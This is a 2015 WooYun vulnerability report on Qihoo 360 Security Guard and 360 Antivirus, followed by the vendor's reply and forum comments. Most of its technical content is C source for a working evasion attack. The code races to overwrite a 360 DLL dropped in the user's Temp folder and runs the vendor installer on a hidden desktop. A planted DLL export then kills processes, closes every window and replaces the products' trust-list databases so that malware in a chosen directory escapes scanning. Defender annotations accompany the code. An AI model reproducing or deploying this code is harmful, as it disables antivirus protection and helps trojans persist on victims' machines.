

缺陷编号:wooyun-2015-096329

漏洞标题:提权替换360信任列表数据库添加目录到扫描白名单(木马躲避杀毒技巧)

相关厂商:奇虎360

漏洞作者: 路人甲

提交时间:2015-02-25 15:29

修复时间:2015-05-27 10:18

公开时间:2015-05-27 10:18

漏洞类型:非授权访问/认证绕过

危害等级:中

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]



漏洞详情

披露状态:

2015-02-25: 细节已通知厂商并且等待厂商处理中
2015-02-26: 厂商已经确认,细节仅向厂商公开
2015-03-01: 细节向第三方安全合作伙伴开放
2015-04-22: 细节向核心白帽子及相关领域专家公开
2015-05-02: 细节向普通白帽子公开
2015-05-12: 细节向实习白帽子公开
2015-05-27: 细节向公众公开

简要描述:

提升权限将特定目录添加到360安全卫士和杀毒的白名单中。

详细说明:

通过创建虚拟桌面提升自身权限,释放预先设定好的白名单数据库文件替换掉现有白名单数据库文件speedmem2.hg和sl2.db,达到将指定目录添加为信任目录的结果,致使木马逃避掉360杀毒的扫描。

2.jpg


444.png

漏洞证明:

提升权限部分:

HINSTANCE hInstance = NULL; // module handle placeholder; nothing in the visible listing reads or assigns it
// Watcher thread. Opens "<profile>\Local Settings\Temp\" for change notification,
// waits until a file whose relative path contains "360net.dll" is reported as
// MODIFIED, and then overwrites that file with "Dll.dll" from the current
// directory (bFailIfExists = FALSE). This is a file-planting race against
// whatever process writes that DLL into Temp — presumably the 360Inst.exe that
// MainDesk launches, which is not shown in the listing.
//
// lpParameter is unused. Returns 1 when the overwrite succeeded, 0 when CopyFile
// failed; calls exit(0) if the Temp directory cannot be opened.
//
// Defender notes: the observable pattern is an untrusted process holding a
// FILE_LIST_DIRECTORY / FILE_FLAG_BACKUP_SEMANTICS handle on the user's Temp and
// rewriting a DLL another product has just dropped there. The product-side fix is
// to never load a DLL from a user-writable location without verifying it (or to
// stage it somewhere only the product can write).
DWORD WINAPI MainBacak(LPVOID lpParameter)
{
SetPriorityClass( GetCurrentProcess(), HIGH_PRIORITY_CLASS ); // try to win the race against the process that drops the DLL
char MydirPath[MAX_PATH];
SHGetSpecialFolderPath(NULL,MydirPath,CSIDL_PROFILE,0); // %USERPROFILE%; return value unchecked
CHAR MyDir[MAX_PATH];
wsprintf(MyDir,"%s\\Local Settings\\Temp\\",MydirPath); // unbounded format into a MAX_PATH buffer; can overflow for a long profile path
const int buf_size = 1024;
CHAR buf[buf_size];
DWORD dwBufWrittenSize;
HANDLE hDir;
// FILE_FLAG_BACKUP_SEMANTICS is what allows a directory to be opened for ReadDirectoryChangesW.
hDir = CreateFile(MyDir, FILE_LIST_DIRECTORY,FILE_SHARE_READ|FILE_SHARE_DELETE,NULL,OPEN_EXISTING,FILE_FLAG_BACKUP_SEMANTICS, NULL);
if (hDir == INVALID_HANDLE_VALUE)
{
CloseHandle(hDir); // closing INVALID_HANDLE_VALUE does nothing useful
exit(0);
}
while(1)
{
// Synchronous wait for any change anywhere under Temp (bWatchSubtree = TRUE, every filter bit set).
if(ReadDirectoryChangesW(hDir, &buf, buf_size, TRUE ,
FILE_NOTIFY_CHANGE_FILE_NAME|
FILE_NOTIFY_CHANGE_DIR_NAME|
FILE_NOTIFY_CHANGE_ATTRIBUTES|
FILE_NOTIFY_CHANGE_SIZE|
FILE_NOTIFY_CHANGE_LAST_WRITE|
FILE_NOTIFY_CHANGE_LAST_ACCESS|
FILE_NOTIFY_CHANGE_CREATION|
FILE_NOTIFY_CHANGE_SECURITY,
&dwBufWrittenSize, NULL, NULL))
{
// Only the first FILE_NOTIFY_INFORMATION record is examined; NextEntryOffset is never
// walked, so any further records delivered in the same batch are dropped.
FILE_NOTIFY_INFORMATION * pfiNotifyInfo = (FILE_NOTIFY_INFORMATION*)buf;
char* pszMultiByte;
pszMultiByte = new char[512]; // leaked on every iteration that does not reach one of the deletes below
ZeroMemory( pszMultiByte, 512);
// FileNameLength is in bytes, hence /2 for the UTF-16 character count. With an explicit
// length the converter does not append a NUL; termination relies on the ZeroMemory above.
WideCharToMultiByte(CP_ACP, 0,pfiNotifyInfo->FileName, pfiNotifyInfo->FileNameLength/2, pszMultiByte, 512, NULL, NULL);

char *p;
p=strstr(pszMultiByte,"360net.dll"); // substring match on the relative path, not an exact file-name check
if(p!=NULL)
{
char tmp360net[MAX_PATH]={0};
lstrcpy(tmp360net,pszMultiByte); // unbounded copy; pszMultiByte can hold up to 512 bytes, tmp360net only MAX_PATH
switch(pfiNotifyInfo->Action)
{
case FILE_ACTION_ADDED:
delete []pszMultiByte;
break;
case FILE_ACTION_REMOVED:
delete []pszMultiByte;
break;
case FILE_ACTION_MODIFIED:
lstrcat(MyDir,tmp360net); // MyDir now names the just-written DLL (unbounded append)
// Replace the DLL the other process just wrote with the attacker-controlled Dll.dll.
if (CopyFile("Dll.dll",MyDir,FALSE)!=0)
{
delete []pszMultiByte;
CloseHandle(hDir);
return 1; // success is signalled to main via the thread exit code

}
else
{
delete []pszMultiByte;
return 0; // hDir is leaked on this path
break; // unreachable after the return above
}


default:
break; // pszMultiByte leaked for any other action
}
}
// p == NULL: pszMultiByte is leaked here as well

}

}
CloseHandle(hDir); // unreachable: the loop above only leaves via return or exit
return 0;
}
// Launcher thread. Creates a hidden desktop named "Virtual" and starts the command
// line passed in lpParameter (main passes "<360safe Path>\modules\360Inst.exe") on
// it with SW_HIDE, so the child shows no UI on the interactive desktop.
// Returns 1 if CreateProcess succeeded, 0 otherwise. Does not wait for the child.
//
// NOTE(review): nothing visible here raises privileges. The desktop and the child
// are created under the caller's own token; the report's "elevation" wording must
// refer to what the launched installer does afterwards, which this listing does
// not show — treat that as unconfirmed.
//
// Defender note: a process creating a desktop called "Virtual" and spawning a
// vendor installer onto it hidden is an observable indicator.
DWORD WINAPI MainDesk(LPVOID lpParameter)
{
HDESK hDesk = CreateDesktop("Virtual", // return value never checked: hDesk may be NULL below
NULL,
NULL,
DF_ALLOWOTHERACCOUNTHOOK,
DESKTOP_CREATEWINDOW|
DESKTOP_ENUMERATE|
DESKTOP_READOBJECTS|
DESKTOP_WRITEOBJECTS|
DESKTOP_HOOKCONTROL ,
NULL
);
STARTUPINFO si = {sizeof(si)};
si.lpDesktop = "Virtual"; // child is attached to the hidden desktop, not the user's
si.dwFlags = STARTF_USESHOWWINDOW;
si.wShowWindow = SW_HIDE;
PROCESS_INFORMATION pi = {0};
// lpParameter is used directly as the command line; no application name, no inherited handles.
if(!CreateProcess(NULL,(LPSTR)(LPCSTR)lpParameter, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi))
{
CloseHandle(pi.hThread); // both handles are still NULL on this path (pi was zero-initialised)
CloseHandle(pi.hProcess);
CloseDesktop(hDesk);
return 0;
}
return 1; // pi.hProcess, pi.hThread and hDesk are leaked on the success path
}
// Launcher entry point. Resolves the 360safe.exe install directory from its
// App Paths registry key, derives "<dir>\modules\360Inst.exe", and then, in an
// endless loop, arms the MainBacak watcher thread before starting the MainDesk
// launcher thread, repeating after each round.
//
// As posted, the MessageBox + ExitProcess(0) pair below terminates the process
// before the loop is reached, so everything after that line is dead code in this
// listing. argc/argv are unused.
int main(int argc, char* argv[])
{
char safe[MAX_PATH]; // stays uninitialised if neither registry key opens; lstrcpy below then reads indeterminate bytes
HKEY hkey;
DWORD type = REG_SZ;
DWORD buffSize=sizeof(safe);
// Native registry view first, then the Wow6432Node view (32-bit product on 64-bit Windows).
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360safe.exe",NULL,KEY_READ,&hkey)==ERROR_SUCCESS)
{
RegQueryValueEx(hkey,"Path",NULL,&type,(LPBYTE)safe,&buffSize); // result and NUL termination of the REG_SZ value unchecked
RegCloseKey(hkey);
}
else
{
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360safe.exe",NULL,KEY_READ,&hkey)==ERROR_SUCCESS)
{
RegQueryValueEx(hkey,"Path",NULL,&type,(LPBYTE)safe,&buffSize);
RegCloseKey(hkey);
}
}
char tmp360safe[MAX_PATH]={0};
lstrcpy(tmp360safe,safe);
lstrcat(tmp360safe,"\\modules\\360Inst.exe"); // installer that MainDesk will run; unbounded append
char MyDir[MAX_PATH];
SHGetSpecialFolderPath(NULL,MyDir,CSIDL_PROFILE,0);
strcat(MyDir,"\\Local Settings\\Temp\\"); // only displayed below; MainBacak recomputes this path itself
MessageBox(NULL,MyDir,NULL,NULL); // debugging stub left in the listing
ExitProcess(0); // process ends here as posted; the code below never runs
if (access(tmp360safe,0)==0) // proceed only if 360Inst.exe exists at the resolved path
{
while(1)
{
HANDLE handle[2]; // valid indices are 0 and 1; handle[2] below writes past the array (undefined behaviour)
handle[1]=CreateThread(NULL,NULL,MainBacak,NULL,CREATE_SUSPENDED,NULL); // watcher, highest priority, started first
SetThreadPriority(handle[1],THREAD_PRIORITY_HIGHEST);
ResumeThread(handle[1]);
handle[2]=CreateThread(NULL,NULL,MainDesk,tmp360safe,CREATE_SUSPENDED,NULL); // launcher, lowest priority, started second
SetThreadPriority(handle[2],THREAD_PRIORITY_LOWEST);
ResumeThread(handle[2]);
WaitForSingleObject(handle[2],INFINITE);
DWORD lpExitCode2;
GetExitCodeThread(handle[2],&lpExitCode2);
if (lpExitCode2==0) // CreateProcess failed: retry immediately with no back-off; closing handle[1] does not stop that thread
{
CloseHandle(handle[2]);
CloseHandle(handle[1]);
continue;
}
WaitForSingleObject(handle[1],INFINITE); // blocks forever if the watcher never sees a matching event
DWORD lpExitCode;
GetExitCodeThread(handle[1],&lpExitCode);
if (lpExitCode==1) // overwrite succeeded
{
CloseHandle(handle[1]);
CloseHandle(handle[2]);
Sleep(15000); // pause, then run the whole round again; nothing ever leaves this loop
}
else
{
CloseHandle(handle[1]);
CloseHandle(handle[2]);
}
}
}

return 0;
}


替换白名单数据库部分:

// Pseudo-random index in [0, count): mixes rand() with the current tick count.
// No srand() call is visible in the listing. Used by HttpCreateDownloadObj to
// vary single letters in the staged temp file names. count == 0 divides by zero.
int Storm(int count)
{
unsigned long Time=GetTickCount();
int seed=rand()+3;
seed=(seed*Time)%count; // int * unsigned long is done in unsigned long; the remainder is narrowed back to int
return seed;
}
// EnumWindows callback: posts WM_CLOSE to every top-level window (posted, not
// sent, so a window is free to ignore it). Always returns TRUE to keep
// enumerating. Side effect for the user: all visible applications are asked to
// close; presumably aimed at the product's own UI, but nothing here filters by window.
BOOL CALLBACK EnumWindowsProc(HWND hwnd,LPARAM IParam)// callback function
{
PostMessage(hwnd, WM_CLOSE, 0, 0);
return TRUE;
}
// Exported from the planted DLL (the "Dll.dll" that MainBacak copies over
// 360net.dll). Presumably the export name matches one the host process resolves
// so that this runs inside it — that cannot be verified from the listing.
// It replaces the two trust-list databases with prebuilt copies so that a chosen
// directory is whitelisted:
//   <360safe Path>\deepscan\speedmem2.hg   (360safe, the security suite)
//   <360sd Path>\sl2.db                    (360sd, the antivirus)
// No return value; the result of every API call is ignored.
//
// Defender notes: the observable sequence is a hidden "taskkill /im load.exe /f",
// WM_CLOSE posted to all windows, reads of the App Paths keys for 360safe.exe and
// 360sd.exe, short-lived files matching sp?edm?m.hg / s?efmm?.ds in the user's
// Temp, then DeleteFile + CopyFile on speedmem2.hg and sl2.db. Writes to those two
// files by anything other than the product itself should be blocked or at least
// alerted on, and the product should verify the databases' integrity rather than
// trust whatever is on disk (the vendor response says this path is now protected).
extern "C" __declspec(dllexport)void HttpCreateDownloadObj()
{
char taskkill[MAX_PATH];
wsprintf(taskkill,"taskkill /im load.exe /f"); // constant string; wsprintf adds nothing here
WinExec(taskkill,SW_HIDE); // force-kills every process named load.exe; which component that is, the page does not say
EnumWindows(EnumWindowsProc,0); // posts WM_CLOSE to every top-level window
char safe[MAX_PATH]; // safe and SD stay uninitialised if their keys do not open; both are used unchecked below
char SD[MAX_PATH];
HKEY hkey;
DWORD type = REG_SZ;
DWORD buffSize=sizeof(safe);
DWORD buffSize1=sizeof(SD);
// Install directory of 360safe.exe: native registry view, then Wow6432Node.
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360safe.exe",NULL,KEY_READ,&hkey)==ERROR_SUCCESS)
{
RegQueryValueEx(hkey,"Path",NULL,&type,(LPBYTE)safe,&buffSize);
RegCloseKey(hkey);
}
else
{
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360safe.exe",NULL,KEY_READ,&hkey)==ERROR_SUCCESS)
{
RegQueryValueEx(hkey,"Path",NULL,&type,(LPBYTE)safe,&buffSize);
RegCloseKey(hkey);
}
}

// Install directory of 360sd.exe: same two-view lookup.
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360sd.exe",NULL,KEY_READ,&hkey)==ERROR_SUCCESS)
{
RegQueryValueEx(hkey,"Path",NULL,&type,(LPBYTE)SD,&buffSize1);
RegCloseKey(hkey);
}
else
{
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360sd.exe",NULL,KEY_READ,&hkey)==ERROR_SUCCESS)
{
RegQueryValueEx(hkey,"Path",NULL,&type,(LPBYTE)SD,&buffSize1);
RegCloseKey(hkey);
}
}
char tmp360safe[MAX_PATH]={0};
lstrcpy(tmp360safe,safe);
lstrcat(tmp360safe,"\\modules\\360Inst.exe"); // built but never used in this function
char MydirPath[MAX_PATH];
SHGetSpecialFolderPath(NULL,MydirPath,CSIDL_PROFILE,0);
CHAR MyDir[MAX_PATH];
wsprintf(MyDir,"%s\\Local Settings\\Temp\\",MydirPath); // ends in a backslash, so the names below contain a doubled separator
CHAR speedmem[MAX_PATH];
wsprintf(speedmem,"%s\\sp%cedm%cm.hg",MyDir,'a'+Storm(26),'a'+Storm(26)); // staged copy, name pattern sp?edm?m.hg
CHAR slD[MAX_PATH];
wsprintf(slD,"%s\\s%cefmm%c.ds",MyDir,'a'+Storm(26),'a'+Storm(26)); // staged copy, name pattern s?efmm?.ds
speedmemSaveFile(speedmem); // defined elsewhere; per the report text it writes the prebuilt 360safe trust-list DB
sdSaveFile(slD); // defined elsewhere; per the report text it writes the prebuilt 360sd trust-list DB
CHAR Newspeedmem[MAX_PATH];
wsprintf(Newspeedmem,"%s\\deepscan\\speedmem2.hg",safe); // live 360safe trust list
CHAR NewslD[MAX_PATH];
wsprintf(NewslD,"%s\\sl2.db",SD); // live 360sd trust list
DeleteFile(Newspeedmem); // delete-then-copy instead of overwriting in place; all four results ignored
DeleteFile(NewslD);
CopyFile(speedmem,Newspeedmem,FALSE);
CopyFile(slD,NewslD,FALSE);
DeleteFile(speedmem); // remove the staged copies from Temp
DeleteFile(slD);
return;
}


speedmemSaveFile与sdSaveFile分别生成预先在360杀毒和360安全卫士下设定好路径的白名单数据库文件。

修复方案:

你们自然晓得怎么修复啦:P

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-02-26 10:17

厂商回复:

感谢乌云白帽子的报告
此问题是通过360安全卫士中一处防御缺陷突破信任机制实现的白名单篡改。

我们在一个月以前就已经从其它渠道获知了该漏洞并进行了修复和升级,目前外网的最新版360都不存在此问题。

最新状态:

暂无


漏洞评价:

评论

  1. 2015-02-25 15:33 | 无心、 ( 实习白帽子 | Rank:71 漏洞数:20 | 你不是风儿,我也不是沙,再怎么缠绵也到不...)

    前排。

  2. 2015-02-25 15:45 | Taro ( 普通白帽子 | Rank:178 漏洞数:48 | 走向最远的方向,哪怕前路迷茫;抱着最大的...)

    看热闹来了

  3. 2015-02-25 15:47 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    想法挺有趣

  4. 2015-02-25 16:02 | RainShine ( 路人 | Rank:2 漏洞数:4 )

    我就看热闹……

  5. 2015-02-25 16:03 | 浅蓝 ( 普通白帽子 | Rank:274 漏洞数:109 | 爱安全:www.ixsec.orgXsec社区:zone.ixse...)

    @疯狗 狗哥求审核漏洞哇~http://www.wooyun.org/bugs/wooyun-2015-098220/trace/d3696fac6fedfc73e5b9cb3414e41f22 http://www.wooyun.org/bugs/wooyun-2015-098218/trace/7ede802f3e44c53f6bd9c619d4cdfb58 http://www.wooyun.org/bugs/wooyun-2015-098216/trace/8622604ba8dbab65162a1716ffd597d6 http://www.wooyun.org/bugs/wooyun-2015-098214/trace/d5f7b1cdff61c342ea8180df5ab97902 http://www.wooyun.org/bugs/wooyun-2015-098213/trace/7afe8ec3e38a4f0ca605bbe66410cab9 http://www.wooyun.org/bugs/wooyun-2015-098182/trace/f63e50138f738b4520247685231d625b http://www.wooyun.org/bugs/wooyun-2015-098181/trace/3e84e04ccad83703fa88cc5da607d53a http://www.wooyun.org/bugs/wooyun-2015-098086/trace/bbba155e0342206751099e13e46988a2 http://www.wooyun.org/bugs/wooyun-2015-098085/trace/a7013d64e1e464e91f768c93532ce809 http://www.wooyun.org/bugs/wooyun-2015-098080/trace/e201246320266c46147badb5ae8cd253 http://www.wooyun.org/bugs/wooyun-2015-097988/trace/fc118e708b58889b3eb32f22364952d7 http://www.wooyun.org/bugs/wooyun-2015-097890/trace/df69ebc6823c8cc505a360c92fb8aa16 http://www.wooyun.org/bugs/wooyun-2015-097754/trace/5cc4b0424a2adacabb6b34d50ef910af http://www.wooyun.org/bugs/wooyun-2015-095786/trace/0a7e573a6b7cb12b7421ec5a745456ae http://www.wooyun.org/bugs/wooyun-2015-094879/trace/63d9f708ea64bbe409f578cc0f769aa5

  6. 2015-02-25 19:32 | 无敌L.t.H ( 路人 | Rank:21 漏洞数:4 | ‮……肉肉捉活,亭长放解)

    能不能把360加到黑名单……

  7. 2015-02-25 20:14 | 泳少 ( 普通白帽子 | Rank:231 漏洞数:79 | ★ 梦想这条路踏上了,跪着也要...)

    还以为把360提权了呢

  8. 2015-02-25 21:17 | 陆由乙 ( 普通白帽子 | Rank:119 漏洞数:38 | 呵呵!)

    360的白名单目录你找得到吗?

  9. 2015-05-27 10:43 | milan ( 普通白帽子 | Rank:129 漏洞数:32 | 妈妈说:搬不完砖就别回家。)

    @浅蓝 哥 你命真苦 都没审核通过